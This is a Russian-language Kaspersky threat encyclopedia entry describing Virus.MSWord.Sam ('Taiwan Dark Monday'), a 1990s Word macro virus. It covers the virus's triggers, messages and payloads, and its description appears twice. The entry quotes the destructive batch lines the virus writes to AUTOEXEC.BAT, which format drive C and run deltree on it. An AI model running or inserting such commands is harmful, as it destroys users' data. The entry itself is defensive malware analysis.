Kaspersky Threats

Класс

Платформа

Описание

Technical Details

Очень опасный зашифрованный макро-вирус. Работает только в китайской версии
Word. Содержит 7 макросов: AutoOpen, AutoExec, AutoNew, FileSaveAs,
ToolsMacro, FileTemplates, Monday. Заражает систему и документы при вызовах
AutoNew, AutoOpen и FileSaveAs. Содержит комментарии:

Created by Samuel Lin
Latest Date Feb 8 '97

По понедельникам в 10:00 записывает в файл C:AUTOEXEC.BAT команды
уничтожения данных на диске:

@echo off
cls
echo HAVE A GOOD TIME
echo               --Taiwan Dark Monday--
echo y|format c: /u /v:MONDAY >nul
deltree /y c: >nul

Затем выводит MessageBox:

Taiwan Dark Monday
Today is Monday, do you work hard?
It's tea time now!
Let's go out and have some fun...

По 13-м понедельникам уничтожает файлы C:WINDOWS*.INI и выводит MessageBox:

It Is Dark Monday...

По прочим понедельникам очищает содержимое текущего документа и выводит MessageBox:

Taiwan Dark Monday
Today is Monday, did you work hard?
Let's take a rest and have some fun... :-)

При вызове FileTemplates очищает содержимое текущего документа, выводит

Taiwan Dark Monday
Go ahead!  Make my day! ! !

затем вставляет в документ текст «TAIWAN DARK MONDAY» и печатает его.
При вызовах ToolsMacro устанавливает у текущего документа пароль «Samuel»,
выводит MessageBox:

Taiwan Dark Monday
You may insert password to access here... ^_^

и ждет ввода строки «Samuel». В случае неправильного ответа вирус выводит тексты:

Taiwan Dark Monday
WRONG PASSWORD!!!
You don't have right to execute this macro command!! :P
Access Denied!!!

Узнай статистику распространения угроз в твоем регионе

Класс	Virus
Платформа	MSWord
Описание	Technical Details Очень опасный зашифрованный макро-вирус. Работает только в китайской версии Word. Содержит 7 макросов: AutoOpen, AutoExec, AutoNew, FileSaveAs, ToolsMacro, FileTemplates, Monday. Заражает систему и документы при вызовах AutoNew, AutoOpen и FileSaveAs. Содержит комментарии: Created by Samuel Lin Latest Date Feb 8 '97 По понедельникам в 10:00 записывает в файл C:AUTOEXEC.BAT команды уничтожения данных на диске: @echo off cls echo HAVE A GOOD TIME echo --Taiwan Dark Monday-- echo y\|format c: /u /v:MONDAY >nul deltree /y c: >nul Затем выводит MessageBox: Taiwan Dark Monday Today is Monday, do you work hard? It's tea time now! Let's go out and have some fun... По 13-м понедельникам уничтожает файлы C:WINDOWS*.INI и выводит MessageBox: It Is Dark Monday... По прочим понедельникам очищает содержимое текущего документа и выводит MessageBox: Taiwan Dark Monday Today is Monday, did you work hard? Let's take a rest and have some fun... :-) При вызове FileTemplates очищает содержимое текущего документа, выводит Taiwan Dark Monday Go ahead! Make my day! ! ! затем вставляет в документ текст «TAIWAN DARK MONDAY» и печатает его. При вызовах ToolsMacro устанавливает у текущего документа пароль «Samuel», выводит MessageBox: Taiwan Dark Monday You may insert password to access here... ^_^ и ждет ввода строки «Samuel». В случае неправильного ответа вирус выводит тексты: Taiwan Dark Monday WRONG PASSWORD!!! You don't have right to execute this macro command!! :P Access Denied!!!
	Узнай статистику распространения угроз в твоем регионе

Virus.MSWord.Sam

Technical Details